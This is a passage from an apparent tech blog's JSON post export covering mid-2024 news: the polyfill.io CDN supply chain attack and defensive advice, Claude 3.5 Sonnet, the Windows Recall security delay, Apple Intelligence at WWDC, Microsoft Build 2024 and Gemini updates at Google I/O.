known about this risk theoretically for years, but polyfill.io makes the risk tangible. Here\u0026rsquo;s why this particular case is so concerning:\nScale: Over 100,000 websites affected, including major brands that should know better.\nLegitimacy of origin: This wasn\u0026rsquo;t a typosquatting attack or a compromised package. It was the legitimate, original domain that developers had intentionally included.\nDomain ownership transfer: The attack vector wasn\u0026rsquo;t technical — it was a business transaction. Someone bought the domain and its associated trust.\nWarning ignored: The original author explicitly warned the community months before the malicious code appeared, and thousands of sites still didn\u0026rsquo;t act.\nWhat You Should Do Right Now # If you maintain any websites, here\u0026rsquo;s your immediate action plan:\nAudit your script tags. Search your HTML templates, CMS themes, and build output for any references to polyfill.io. Remove them immediately.\nAssess if you even need polyfills. In 2024, the browsers that needed polyfills (mainly IE 11 and older) are effectively extinct. Most modern browsers support ES6+ features natively. Check caniuse.com for your target features — you probably don\u0026rsquo;t need polyfills at all anymore.\nIf you genuinely need polyfills, use Cloudflare\u0026rsquo;s alternative at cdnjs.cloudflare.com/polyfill/ or Fastly\u0026rsquo;s at polyfill-fastly.io. Better yet, bundle them with your build process so you control the code.\nImplement Subresource Integrity (SRI). For any third-party script you do load, use the integrity attribute on your script tags. This ensures the browser only executes the script if its hash matches what you expect. SRI wouldn\u0026rsquo;t have prevented the initial compromise if the polyfill code was dynamically generated per-request (which it was), but it\u0026rsquo;s a critical defense for static CDN resources.\nUse Content Security Policy (CSP) headers. Restrict which domains can serve executable scripts on your pages. This limits the blast radius of any single compromised CDN.\nMonitor your dependencies. Set up automated scanning for your production sites that checks for unexpected script sources or content changes.\nMy Take # This incident frustrates me because it was entirely preventable. Not just the attack itself, but the vulnerability pattern. I\u0026rsquo;ve been arguing for years that loading JavaScript from domains you don\u0026rsquo;t control is an underappreciated risk. The convenience of CDN-hosted libraries comes with an implicit trust relationship that most developers never think about.\nThe web development community has done excellent work on package-level supply chain security — lockfiles, audit tools, dependency scanning. But we\u0026rsquo;ve largely ignored the CDN layer, treating it as a networking optimization rather than a security boundary. Polyfill.io proves that the domain serving your scripts is as critical as the code in your node_modules.\nThe uncomfortable truth is that this attack was successful not because of technical sophistication but because of organizational inertia. Warnings went out in February. The attack was confirmed in June. Four months of clear, public warnings, and over 100,000 sites were still vulnerable. That\u0026rsquo;s not a technology problem — it\u0026rsquo;s a process problem.\nIf there\u0026rsquo;s one takeaway from this incident, it\u0026rsquo;s this: treat every third-party script source as a dependency that can be compromised, and minimize them accordingly. Self-host what you can, use SRI for what you can\u0026rsquo;t, and maintain an inventory of every external domain your site trusts with code execution. The web\u0026rsquo;s trust model is fragile, and this week proved it.\n","date":"27 June 2024","externalUrl":null,"permalink":"/posts/240627-polyfill-io-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The polyfill.io domain was acquired by a Chinese company and began injecting malware into over 100,000 websites, exposing fundamental weaknesses in how we trust third-party CDN dependencies.","title":"The Polyfill.io Supply Chain Attack — A Wake-Up Call for CDN Trust","type":"posts"},{"content":"The AI model landscape just shifted again. Today, Anthropic released Claude 3.5 Sonnet, and the benchmarks are turning heads. The mid-tier model in their lineup is outperforming GPT-4o on most coding benchmarks while running at twice the speed and one-fifth the cost of their previous top model, Claude 3 Opus. For those of us who use LLMs as daily development tools, this isn\u0026rsquo;t just another incremental update — it\u0026rsquo;s a meaningful shift in what\u0026rsquo;s available.\nThe Numbers That Matter # Let\u0026rsquo;s start with the benchmarks that are most relevant to developers. On HumanEval, the standard coding benchmark, Claude 3.5 Sonnet scores 92.0% — surpassing GPT-4o\u0026rsquo;s 90.2%. On the graduate-level reasoning benchmark (GPQA), it hits 59.4%, compared to GPT-4o\u0026rsquo;s 53.6%. But the benchmark that caught my eye is the internal \u0026ldquo;agentic coding\u0026rdquo; evaluation Anthropic shared, where Claude 3.5 Sonnet solved 64% of problems compared to Claude 3 Opus at 38%.\nBenchmarks are always somewhat synthetic, and I\u0026rsquo;ve been in this field long enough to know that real-world performance often diverges from leaderboard scores. But the early anecdotal evidence from developers aligns with these numbers. Multi-file refactoring tasks, understanding complex codebases, and generating tests all seem measurably improved.\nThe speed improvement is equally important. Sonnet operates at roughly twice the token throughput of Opus, which means faster completions in interactive coding sessions. When you\u0026rsquo;re using an AI assistant in your IDE, the difference between a 3-second and a 6-second response significantly affects your flow state. I\u0026rsquo;ve been feeling this friction with Opus for a while — capable but slow enough to break concentration.\nArtifacts: Rethinking the Chat Interface # Alongside the model release, Anthropic introduced Artifacts — a new feature in the Claude interface that renders generated content in a dedicated panel alongside the conversation. When you ask Claude to write code, create a document, or build a simple application, the output appears in an interactive preview that you can iterate on.\nThis might sound like a UI detail, but it represents a shift in how we interact with AI coding assistants. Instead of copying code from a chat window into your editor, you get a live preview that you can modify and refine within the conversation. For quick prototyping, creating utility scripts, or building proof-of-concept applications, this workflow is remarkably efficient.\nI spent an hour today building a data visualization dashboard through Artifacts — describing what I wanted, seeing it rendered immediately, and iterating on the design through conversation. The entire process from concept to working prototype took about 20 minutes. That same task would have taken me half a day with traditional development, including the inevitable fiddling with chart library documentation.\nThe Competitive Landscape Shifts # What makes this release strategically significant is the pricing model. Claude 3.5 Sonnet is priced at $3 per million input tokens and $15 per million output tokens — the same as Claude 3 Sonnet, their previous mid-tier model. You\u0026rsquo;re getting performance that exceeds the previous flagship at the mid-tier price point. Anthropic is effectively making top-tier AI coding assistance significantly more accessible.\nThis creates real competitive pressure on OpenAI. GPT-4o is priced similarly, but if Claude 3.5 Sonnet consistently outperforms it on coding tasks, developers building AI-powered tools will start defaulting to Anthropic\u0026rsquo;s API. The downstream effects on products like Cursor, Cody, and other AI coding tools could be significant — many of these tools offer model selection, and users will gravitate toward better results.\nGoogle\u0026rsquo;s Gemini 1.5 Pro is also in this competitive mix, and its million-token context window gives it unique advantages for large codebase analysis. But on pure code generation quality, Claude 3.5 Sonnet appears to have the edge right now.\nWhat This Means for Developer Workflows # I\u0026rsquo;ve been using AI coding assistants since the early days of Copilot, and I\u0026rsquo;ve watched the capability curve closely. We\u0026rsquo;re reaching a point where these tools are genuinely useful for substantive programming tasks, not just autocomplete. Specific areas where I\u0026rsquo;m seeing real productivity gains with this class of model:\nCode review and refactoring. Point Claude 3.5 Sonnet at a messy function and ask it to refactor with specific constraints (maintain the API, improve error handling, add typing). The suggestions are increasingly production-quality.\nTest generation. Describe the edge cases you\u0026rsquo;re worried about, and the model generates comprehensive test suites that actually catch bugs. This has been a weak point of earlier models, but the improvement is notable.\nDocumentation. Generating accurate docstrings, README files, and API documentation from code. The model understands intent well enough that the documentation reads naturally, not like machine-generated boilerplate.\nDebugging complex issues. Paste in a stack trace, relevant code, and a description of the expected behavior. The diagnostic reasoning is significantly better than previous models — it considers multiple hypotheses and asks clarifying questions.\nThe 200K context window (same as Claude 3 Opus) means you can feed substantial portions of a codebase into a single conversation. For understanding how a change propagates through a system, this is invaluable.\nMy Take # The AI coding assistant space is maturing faster than I expected. Six months ago, I was treating these tools as useful-but-unreliable helpers that needed constant verification. With Claude 3.5 Sonnet, I\u0026rsquo;m starting to trust the output enough to use it for more critical tasks — still with review, but with less overhead.\nWhat I find most interesting is the business model dynamic. Anthropic is releasing what is arguably the best coding AI available, at mid-tier pricing. This pushes the entire market toward making top-tier AI accessible to individual developers and small teams, not just enterprises with large API budgets.\nThe real question is sustainability. Training and serving these models is extraordinarily expensive, and the pricing suggests companies are prioritizing market share over margins. That race benefits developers in the short term, but I wonder about the long-term equilibrium.\nFor now, though, if you\u0026rsquo;re a developer not yet using AI assistance in your workflow, Claude 3.5 Sonnet might be the model that changes your mind. The quality-to-cost ratio has crossed a threshold that makes it practical for daily use, not just occasional experimentation. I\u0026rsquo;ve updated my default model in every tool that offers the choice. The improvement is that clear.\n","date":"20 June 2024","externalUrl":null,"permalink":"/posts/240620-claude-35-sonnet-raises-the-bar/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic releases Claude 3.5 Sonnet, which benchmarks above GPT-4o on coding tasks while running faster and cheaper — reshaping the competitive landscape for AI-assisted development.","title":"Claude 3.5 Sonnet — Anthropic Raises the Bar for Coding AI","type":"posts"},{"content":"Two weeks ago, I wrote about Microsoft Build 2024 and flagged Windows Recall as a feature that raised serious security concerns. This week, those concerns were validated in dramatic fashion. Security researcher Kevin Beaumont published findings showing that Recall\u0026rsquo;s database — which stores screenshots of everything you do on your PC — was stored in plain text, accessible to any application running on the machine. Microsoft has now delayed the feature, pulling it from the upcoming Copilot+ PC launch and moving it to a Windows Insider preview instead.\nThis is a rare case where the security community\u0026rsquo;s pushback actually changed a major product launch timeline. And there are important lessons here for all of us building software.\nWhat Went Wrong # The core issue was almost embarrassingly basic. Recall continuously captured screenshots, ran them through OCR and semantic analysis on the NPU, and stored the results in a local SQLite database. That database was supposed to be protected, but Beaumont demonstrated that it was stored in the user\u0026rsquo;s AppData folder in plain text. Any process running under the user\u0026rsquo;s context — including malware — could simply read the entire database without elevated privileges.\nLet that sink in: a feature designed to create a complete, searchable record of everything you\u0026rsquo;ve ever viewed on your computer stored that data in a way that any malicious application could trivially exfiltrate. We\u0026rsquo;re talking about screenshots of banking sessions, password managers, private messages, medical records, confidential documents — all indexed and searchable, sitting in an unencrypted SQLite file.\nSecurity researcher Alex Hagenah went a step further and released TotalRecall, a proof-of-concept tool that could extract and display the Recall database contents. The tool worked exactly as you\u0026rsquo;d expect — because there was essentially no security barrier to overcome.\nThe Response # To Microsoft\u0026rsquo;s credit, the response was relatively swift. On June 7, they announced Recall would be pulled from the Copilot+ PC launch scheduled for June 18 and moved to the Windows Insider Program. They committed to several changes: Recall would be opt-in rather than opt-on by default, Windows Hello biometric authentication would be required to access the timeline, and the database would be encrypted with keys tied to the device\u0026rsquo;s TPM.\nThese are all improvements that should have been in the original design. The fact that they weren\u0026rsquo;t suggests that the feature was rushed through development without adequate security review — likely driven by competitive pressure to show AI capabilities at Build.\nPavan Davuluri, Microsoft\u0026rsquo;s head of Windows, framed the delay as wanting to ensure a \u0026ldquo;trusted experience.\u0026rdquo; That\u0026rsquo;s the right instinct, but it raises the question: why wasn\u0026rsquo;t this the starting point?\nThe Deeper Problem: AI Feature Velocity vs. Security # This incident illustrates a tension that I think will define the next few years of software development. Companies are under enormous pressure to ship AI features quickly. The competitive landscape is moving at a pace I haven\u0026rsquo;t seen since the early days of the web. But AI features often handle sensitive data in new ways — and the security implications of those new data flows aren\u0026rsquo;t always obvious during the feature design phase.\nRecall is a perfect case study. The feature concept makes sense: use AI to create a searchable memory of your computing activity. But the implementation requires creating what is essentially the most sensitive data store on any consumer device. That store needs to be treated with the same level of security architecture as a credential manager or disk encryption system — not as a regular application database.\nI\u0026rsquo;ve been involved in security architecture reviews for decades, and the pattern is familiar. A product team builds an exciting feature, security review happens too late in the cycle (or not thoroughly enough), and the result ships with fundamental design flaws. The difference now is that AI features tend to aggregate and process data in ways that amplify the impact of any security failure.\nLessons for Developers # If you\u0026rsquo;re building applications that integrate AI features — and increasingly, most of us are — this incident offers concrete lessons:\nThreat model your data stores early. Before you write a line of code, ask: what\u0026rsquo;s the worst thing that happens if this data is fully compromised? If the answer is \u0026ldquo;catastrophic,\u0026rdquo; design your security architecture first.\nDefault to encrypted, not plaintext. In 2024, there\u0026rsquo;s no excuse for storing sensitive data in unencrypted SQLite databases. Use platform encryption APIs, tie keys to hardware security modules (TPM, Secure Enclave), and require authentication for access.\nOpt-in for sensitive features. Recall was originally going to be enabled by default. For any feature that captures, stores, or processes sensitive user data in new ways, the ethical and practical default is opt-in with clear disclosure.\nAssume hostile local processes. If your application stores valuable data, assume that malware running under the same user context will try to read it. Design your access controls accordingly. Sandboxing, separate process isolation, and hardware-backed encryption are your friends.\nSecurity review before launch announcements. The awkwardness of delaying a feature after a major keynote is nothing compared to the reputational damage of shipping a security vulnerability. Build security review into your launch timeline, not after it.\nMy Take # I\u0026rsquo;m actually somewhat optimistic about this outcome. Yes, the original Recall implementation was a security failure. But the fact that Microsoft responded to community feedback and delayed the launch — rather than shipping and patching later — suggests that the feedback mechanisms are working. This is how the industry should function: researchers identify problems, companies listen, and products improve before reaching consumers.\nThe broader lesson is that the AI gold rush doesn\u0026rsquo;t exempt anyone from security fundamentals. If anything, the novel data patterns created by AI features demand more rigorous security architecture, not less. Every developer building AI-powered features should be looking at the Recall incident as a case study in what not to do — and more importantly, as a reminder that security can\u0026rsquo;t be bolted on after the exciting demo is built.\nMicrosoft will eventually ship Recall, and hopefully with the security architecture it should have had from day one. In the meantime, the rest of us have a useful reminder: no matter how impressive the AI capability, the fundamentals of data protection still apply.\n","date":"13 June 2024","externalUrl":null,"permalink":"/posts/240613-microsoft-recall-delayed-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft pulls Windows Recall from the upcoming Copilot+ PC launch after security researchers demonstrate alarming vulnerabilities in the feature’s data storage.","title":"Microsoft Delays Recall — When Security Concerns Actually Win","type":"posts"},{"content":"After months of speculation about whether Apple was \u0026ldquo;behind\u0026rdquo; in the AI race, WWDC 2024 just delivered their answer: Apple Intelligence. And in typical Apple fashion, they\u0026rsquo;ve taken a fundamentally different approach than the competition. Rather than building the biggest model or the flashiest chatbot, Apple is weaving AI deeply into the operating system layer with a privacy-first architecture that leverages on-device processing wherever possible — and a new \u0026ldquo;Private Cloud Compute\u0026rdquo; infrastructure for when it can\u0026rsquo;t.\nI\u0026rsquo;ve been developing for Apple platforms since the early Mac OS days, and this feels like one of those inflection points where Apple\u0026rsquo;s integrated hardware-software approach gives them an unfair advantage.\nThe Architecture: On-Device First # The technical architecture of Apple Intelligence is what separates it from the competition. Apple is running foundation models directly on-device, taking advantage of the Neural Engine in their A17 Pro and M-series chips. The base models are relatively compact — Apple\u0026rsquo;s technical blog describes them as approximately 3 billion parameter models — but they\u0026rsquo;re optimized specifically for Apple Silicon using a combination of grouped-query attention, quantization techniques, and adapter-based fine-tuning.\nWhat\u0026rsquo;s clever is the adapter approach. Rather than shipping one massive model, Apple uses a smaller base model with task-specific adapters (using LoRA-style techniques) that can be loaded dynamically. Writing assistance uses one adapter, notification summarization uses another, image generation uses yet another. This keeps memory usage manageable on mobile devices while still providing specialized capabilities.\nFor developers, Apple is exposing these capabilities through new APIs. The App Intents framework gets a significant expansion, allowing Siri to take actions within third-party apps using natural language. If you\u0026rsquo;ve built proper intents for your app, Siri can now chain together actions across multiple apps to complete complex requests. This is the kind of deep OS integration that cloud-based assistants simply can\u0026rsquo;t match.\nPrivate Cloud Compute: A New Trust Model # When tasks exceed what can be handled on-device, Apple routes them to what they\u0026rsquo;re calling Private Cloud Compute — custom Apple Silicon servers running a hardened, stateless operating system. The key claims: your data is never stored on the server, Apple employees can\u0026rsquo;t access it, and the entire software stack is cryptographically verifiable by independent security researchers.\nThis is a genuinely novel approach. Rather than asking users to trust that a cloud provider won\u0026rsquo;t look at their data (the current model for every other AI assistant), Apple is building a system where the trust is architecturally enforced. The servers run a locked-down OS with no persistent storage, no remote shell access, and no logging of user requests. Third-party auditors can verify the code running on the servers matches what Apple publishes.\nAs someone who has worked on systems where data privacy was paramount, I appreciate this approach. It\u0026rsquo;s not perfect — you\u0026rsquo;re still trusting Apple\u0026rsquo;s silicon and firmware — but it\u0026rsquo;s a meaningful step beyond \u0026ldquo;trust us, we have a privacy policy.\u0026rdquo;\nThe ChatGPT Partnership # Perhaps the most surprising announcement was the integration of OpenAI\u0026rsquo;s ChatGPT directly into iOS 18, iPadOS 18, and macOS Sequoia. When Apple Intelligence encounters a query it can\u0026rsquo;t handle with its own models, it can offer to escalate to ChatGPT — with explicit user consent each time. No account is required, and Apple says OpenAI doesn\u0026rsquo;t store the requests or use them for training.\nThis is a pragmatic move. Apple clearly recognized that their on-device models, while capable for system-level tasks, can\u0026rsquo;t match GPT-4o for open-ended knowledge queries and complex reasoning. Rather than pretending otherwise (which would have been very un-Apple), they partnered with the market leader while maintaining their privacy principles through the consent-and-no-storage model.\nFor developers, this creates an interesting dynamic. Your app might interact with Apple\u0026rsquo;s on-device models for quick, private operations, and optionally tap into GPT-4o for more complex tasks — all through Apple\u0026rsquo;s APIs. The user experience is unified even though the backend is hybrid.\nDeveloper Implications # Beyond Apple Intelligence, WWDC brought several meaningful developer updates. Swift 6 introduces complete data-race safety checking at compile time — a significant step for concurrent programming. The new Swift Testing framework offers a modern, macro-based approach to unit testing that feels more natural than XCTest.\nXcode 16 gets \u0026ldquo;Predictive Code Completion\u0026rdquo; powered by a model trained specifically on Swift and Apple SDKs. Having tried it briefly during the keynote demo stream, it looks more contextually aware than generic code completion tools because it understands Apple\u0026rsquo;s frameworks deeply.\nThe Vision Pro also got meaningful updates with visionOS 2, including volumetric APIs and spatial photos generated from existing 2D images. Whether spatial computing takes off remains to be seen, but Apple is clearly committed to building out the developer platform.\nMy Take # What impresses me about Apple\u0026rsquo;s AI strategy is the restraint. In a market where everyone is racing to ship the most capable AI regardless of privacy or reliability concerns, Apple chose to ship something more limited but more trustworthy. The on-device models won\u0026rsquo;t write your novel or debug complex code, but they\u0026rsquo;ll summarize your notifications, clean up your writing, and organize your photos — tasks where reliability and privacy matter more than raw capability.\nThe Private Cloud Compute architecture is the real innovation here. If it works as described — and I expect security researchers will be testing those claims aggressively — it establishes a new standard for cloud AI privacy. Every other provider will face the question: \u0026ldquo;Why can\u0026rsquo;t you do what Apple does?\u0026rdquo;\nFor those of us building software, the message is clear: AI is becoming an OS-level capability, not just a cloud service. The apps that integrate well with Apple Intelligence through proper App Intents and system APIs will feel native and intelligent. Those that don\u0026rsquo;t will feel increasingly dated. Time to update those Xcode projects.\n","date":"6 June 2024","externalUrl":null,"permalink":"/posts/240606-apple-wwdc-2024-intelligence/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple Intelligence debuts at WWDC 2024 with on-device AI, a ChatGPT partnership, and a privacy-first approach that could reshape how we think about AI integration.","title":"WWDC 2024 — Apple Finally Shows Its AI Hand","type":"posts"},{"content":"Microsoft Build wrapped up last week, and if there was any doubt about where Redmond is placing its chips, those doubts are gone. This year\u0026rsquo;s developer conference was wall-to-wall AI, from the new \u0026ldquo;Copilot+ PC\u0026rdquo; category to the controversial Windows Recall feature that promises to remember everything you\u0026rsquo;ve ever done on your computer. After thirty years in this industry, I\u0026rsquo;ve seen plenty of platform shifts announced with fanfare — but this one feels like Microsoft is genuinely restructuring its entire product line around a single bet.\nCopilot+ PCs: A New Hardware Category # The headline announcement was the introduction of Copilot+ PCs — a new tier of Windows machines built around dedicated Neural Processing Units (NPUs) capable of at least 40 TOPS (trillion operations per second). Microsoft partnered with Qualcomm on the initial wave, using the Snapdragon X Elite and X Plus chips, with AMD and Intel support promised later.\nWhat\u0026rsquo;s interesting here isn\u0026rsquo;t the hardware spec itself — NPUs have been shipping in phones for years. It\u0026rsquo;s that Microsoft is now defining a minimum AI compute threshold as a platform requirement. This is a deliberate move to create a baseline that developers can target. If you know every Copilot+ PC has at least 40 TOPS of local inference capability, you can build features that depend on it.\nFor developers, this means a new class of on-device AI workloads becomes viable. Local inference for code completion, real-time translation, image generation — all without round-tripping to the cloud. The latency and privacy implications are significant. I\u0026rsquo;ve been running some local LLMs on my development machines, and the difference between cloud and local inference for developer tooling is night and day in terms of responsiveness.\nWindows Recall: Ambitious or Alarming? # The feature that\u0026rsquo;s generating the most debate is Windows Recall. The concept: Windows continuously takes screenshots of everything on your screen, processes them with on-device AI, and builds a searchable semantic index of your entire computing history. Want to find that restaurant someone recommended in a Teams call three weeks ago? Just search for it in natural language.\nThe technical implementation is genuinely impressive. The screenshots are processed locally using the NPU, the index is stored in an encrypted SQLite database, and Microsoft says the data never leaves your device. They\u0026rsquo;re using OCR combined with semantic understanding to make the content searchable.\nBut I have serious reservations. As someone who\u0026rsquo;s spent considerable time on security architecture, the idea of a constantly-updating database containing screenshots of everything — passwords being typed, sensitive documents, private messages — is a security researcher\u0026rsquo;s nightmare. Even if the database is encrypted at rest, it becomes a single, extraordinarily valuable target. If malware gains access to that database, or if a vulnerability in the encryption implementation surfaces, the blast radius is enormous.\nThe security community is already raising red flags, and rightfully so. I expect we\u0026rsquo;ll see significant pushback on this before the June 18 launch date.\nAzure AI Gets Deeper Integration # Beyond the consumer-facing announcements, Build 2024 brought meaningful updates for cloud developers. Azure AI Studio is being positioned as the central hub for building AI applications, with support for over 1,600 models from the model catalog. The new Azure AI model inference API provides a unified endpoint for interacting with different models — something that reduces the friction of switching between providers.\nGitHub Copilot Workspace was another standout. The idea is that you start from a GitHub Issue, and Copilot generates a plan, implements changes across multiple files, and lets you iterate on the result before creating a pull request. I\u0026rsquo;ve been using Copilot for over a year now, and while it\u0026rsquo;s excellent for autocomplete-style assistance, the workspace concept pushes into genuine software engineering territory — understanding requirements, planning changes, and executing across a codebase.\nThe Team Copilot features for Microsoft 365 are also worth noting. AI that can facilitate meetings, manage project tasks, and act as a collaborative agent within Teams channels. Microsoft is clearly betting that AI assistants will become as fundamental to workplace software as spell-check.\nThe Developer Platform Play # What struck me most about Build 2024 is the coherence of Microsoft\u0026rsquo;s strategy. Every announcement — from hardware NPU requirements to cloud AI APIs to developer tools — is part of a single, integrated vision. They\u0026rsquo;re building a platform where AI is the substrate, not a feature.\nThis is reminiscent of the mobile-first pivot of the early 2010s, but potentially more transformative. When Satya Nadella says \u0026ldquo;every app will be a Copilot app,\u0026rdquo; he\u0026rsquo;s not just speaking in marketing terms — he\u0026rsquo;s describing a technical architecture where AI inference is a first-class platform capability at every layer of the stack.\nMy Take # I\u0026rsquo;ve been through enough technology cycles to know that not every bold vision pans out. But Microsoft\u0026rsquo;s position here is strong: they have the cloud infrastructure (Azure), the developer tools (VS Code, GitHub), the enterprise distribution (Microsoft 365), and now the hardware partnerships for on-device AI. That\u0026rsquo;s a more complete stack than anyone else can offer right now.\nMy concern is the pace. Shipping features like Recall before the security implications are fully vetted feels rushed. The competitive pressure from Google and Apple is clearly driving timelines, but in enterprise software, trust is earned slowly and lost quickly.\nFor developers, though, the practical takeaway is clear: invest time in understanding the AI toolchain Microsoft is building. Whether it\u0026rsquo;s Azure AI Studio, Copilot extensions, or building for NPU-enabled devices, these capabilities are going to be expected by users and employers alike within the next year or two. The Copilot era isn\u0026rsquo;t coming — it\u0026rsquo;s here.\n","date":"30 May 2024","externalUrl":null,"permalink":"/posts/240530-microsoft-build-2024-copilot-era/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2024 doubles down on AI with Copilot+ PCs, Windows Recall, and deep Azure AI integrations — but is the industry ready for always-on AI?","title":"Microsoft Build 2024 — The Copilot Era Gets Real","type":"posts"},{"content":"Microsoft Build 2024 wrapped up yesterday, and after digesting two days of announcements, the picture is clear: Microsoft is building an entire development platform around the concept of \u0026ldquo;copilots.\u0026rdquo; Not just GitHub Copilot for code, but a full stack for creating, deploying, and managing AI assistants across every layer of the enterprise. Whether you find this exciting or exhausting probably depends on how deeply invested you are in the Microsoft ecosystem.\nThe Copilot Stack, Explained # Satya Nadella\u0026rsquo;s keynote laid out what Microsoft is calling the Copilot stack — a layered architecture for building AI-powered applications. At the bottom, you have the infrastructure: Azure AI with access to OpenAI models, Phi-3 small language models, and third-party models through the model catalog. In the middle, there\u0026rsquo;s the orchestration layer: Copilot Studio for building custom copilots, Semantic Kernel for developer-level control, and AI Search for grounding. At the top, there are the copilot experiences integrated into Microsoft 365, Dynamics, and other first-party products.\nThe most significant announcement for developers is the expansion of Copilot Studio, which now lets you build custom copilots that can reason over your organization\u0026rsquo;s data, take actions through connectors, and be deployed across Microsoft Teams, web, and mobile. Think of it as a low-code platform for building domain-specific AI assistants — your HR copilot, your IT support copilot, your sales copilot.\nFor those of us who\u0026rsquo;ve been building chatbots and virtual assistants the hard way — stitching together LLM calls, retrieval pipelines, and action frameworks with custom code — Copilot Studio represents a significant reduction in development effort. The tradeoff, as always with low-code platforms, is flexibility. If your use case fits the patterns Microsoft has designed for, it\u0026rsquo;s remarkably productive. If it doesn\u0026rsquo;t, you\u0026rsquo;ll hit walls.\nTeam Copilot — From Assistant to Participant # One of the more interesting announcements is Team Copilot, which evolves the Copilot concept from a personal assistant to a team member. In meetings, Team Copilot can manage the agenda, take notes, and track action items. In group chats, it can be assigned tasks and report back. In project management contexts (through Planner integration), it can create and assign tasks based on project plans.\nThis is a subtle but important shift. Previous AI assistant paradigms have been one-to-one: you ask, it answers. Team Copilot operates as a participant in collaborative workflows, which introduces interesting questions about accountability, trust, and workflow design. When an AI agent is creating tasks and assigning them to humans, you need clear governance around what it can and can\u0026rsquo;t do autonomously.\nI\u0026rsquo;ve seen enough enterprise technology deployments to know that the success of Team Copilot will depend entirely on how well organizations manage the change management aspect. The technology is capable; the organizational readiness is the bottleneck.\nGitHub Copilot Workspace # For developers specifically, GitHub Copilot Workspace is the announcement that resonated most with me. It\u0026rsquo;s a new development environment concept where you start with a GitHub Issue, and Copilot Workspace generates a plan, proposes code changes across multiple files, and lets you iterate on the implementation before creating a pull request.\nThis is different from the inline code completion we\u0026rsquo;ve been using in Copilot for the past two years. It\u0026rsquo;s operating at the task level rather than the line level — understanding the broader context of what you\u0026rsquo;re trying to accomplish and generating coherent multi-file changes. In the demos, it looked genuinely useful for well-defined tasks like bug fixes, feature additions from clear specs, and dependency updates.\nThe pragmatist in me notes that \u0026ldquo;well-defined tasks\u0026rdquo; is doing a lot of heavy lifting in that description. The hardest parts of software development — understanding ambiguous requirements, making architectural tradeoffs, navigating legacy codebases with undocumented assumptions — are precisely the areas where current AI capabilities fall short. Copilot Workspace will be fantastic for the 30% of development work that\u0026rsquo;s well-structured. The other 70% still needs experienced engineers.\nPhi-3 and the Small Language Model Strategy # Microsoft\u0026rsquo;s continued investment in the Phi-3 family of small language models is strategically interesting. Phi-3-mini, with 3.8 billion parameters, achieves performance competitive with much larger models on many benchmarks. Phi-3-small (7B) and Phi-3-medium (14B) extend this further.\nFor developers building applications where latency, cost, or data privacy requirements make large cloud-hosted models impractical, small language models are increasingly viable. Running a Phi-3-mini on-device or in a private cloud instance gives you capable AI without the data governance headaches of sending everything to a third-party API.\nI\u0026rsquo;ve been experimenting with small models for specific tasks — code review, log analysis, document classification — and the results are often surprisingly good when the task is well-scoped. The key insight is that you don\u0026rsquo;t need GPT-4-class intelligence for every AI feature. Matching model capability to task complexity is becoming an important architectural skill.\nMy Take # Build 2024 shows Microsoft executing on a clear strategy: make AI development accessible at every level, from low-code Copilot Studio to pro-code Semantic Kernel, and embed AI capabilities into every product surface. It\u0026rsquo;s comprehensive, well-funded, and leveraging Microsoft\u0026rsquo;s unmatched distribution through enterprise channels.\nMy concern is complexity. The Microsoft AI development landscape now includes Azure OpenAI Service, Azure AI Studio, Copilot Studio, Semantic Kernel, AI Search, Phi-3 models, and half a dozen other components. For enterprise developers already navigating the Microsoft ecosystem, adding AI capabilities is relatively straightforward. For everyone else, the onboarding curve is steep.\nThe practical advice: if you\u0026rsquo;re a Microsoft shop, lean into Copilot Studio and explore GitHub Copilot Workspace. The productivity gains are real. If you\u0026rsquo;re not, take note of the small language model trend — Phi-3 and models like it are making local AI deployment increasingly practical, regardless of your cloud provider.\nThree major developer conferences in three weeks — OpenAI, Google I/O, and now Build. The AI platform war is fully engaged, and developers have never had more options. The challenge now is choosing wisely and building architectures that can adapt as this landscape continues to shift.\n","date":"23 May 2024","externalUrl":null,"permalink":"/posts/240523-microsoft-build-2024-copilot-stack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2024 reveals the full Copilot stack strategy. From custom copilots to Team Copilot, here’s what developers need to know about building on Microsoft’s AI platform.","title":"Microsoft Build 2024 — The Copilot Stack and the Future of Developer Tooling","type":"posts"},{"content":"Google I/O 2024 happened on Tuesday, and if you watched the keynote, you could be forgiven for thinking Google had renamed itself to Gemini. The word was mentioned over 120 times during the two-hour presentation. But once you filter out the marketing repetition, there are genuine developer-facing changes worth unpacking — particularly around Gemini 1.5 Pro, the new Gemini 1.5 Flash model, and Google\u0026rsquo;s aggressive push to make its AI infrastructure the default development platform.\nGemini 1.5 Pro Gets a Million-Token Context Window for Everyone # The headline capability that matters most for developers is the expansion of Gemini 1.5 Pro\u0026rsquo;s context window to 1 million tokens in the generally available release, with a 2-million-token window available in preview. To put this in perspective, that\u0026rsquo;s roughly 1,500 pages of text, or an hour of video, or 11 hours of audio — all processable in a single API call.\nI\u0026rsquo;ve been working with various LLMs\u0026rsquo; context windows for months now, and the practical difference between 128K tokens (GPT-4 Turbo\u0026rsquo;s limit) and 1M tokens isn\u0026rsquo;t just quantitative — it\u0026rsquo;s qualitative. The evolution from early GPT-3 experiments through GPT-4\u0026rsquo;s capabilities has been dramatic, but this context window expansion is equally transformative. At 1M tokens, you can feed an entire codebase into the context. You can process complete documentation sets. You can analyze full-length videos without chunking. The kinds of applications this enables are fundamentally different from what\u0026rsquo;s possible with shorter contexts.\nIn my testing with the preview API, the retrieval quality across that full context window is impressive. Google\u0026rsquo;s \u0026ldquo;needle in a haystack\u0026rdquo; benchmarks show near-perfect recall even at the million-token scale, which aligns with what I\u0026rsquo;ve observed in practice. The model genuinely uses the full context rather than degrading at the edges.\nGemini 1.5 Flash — The Price-Performance Play # Perhaps more interesting for production applications is Gemini 1.5 Flash, a new lightweight model designed for high-volume, latency-sensitive tasks. Flash is significantly faster and cheaper than Pro while maintaining surprisingly strong performance on most benchmarks.\nThis slots into a pattern we\u0026rsquo;re seeing across all major AI providers: the emergence of a model tier specifically designed for the \u0026ldquo;good enough, but fast and cheap\u0026rdquo; use case. OpenAI has GPT-4o, Anthropic has Claude 3 Haiku, and now Google has Flash. For developers building AI features into products, having this range of price-performance options is incredibly valuable. This follows the pattern established by earlier AI model tiers where multiple capability levels serve different needs.\nFlash supports the same 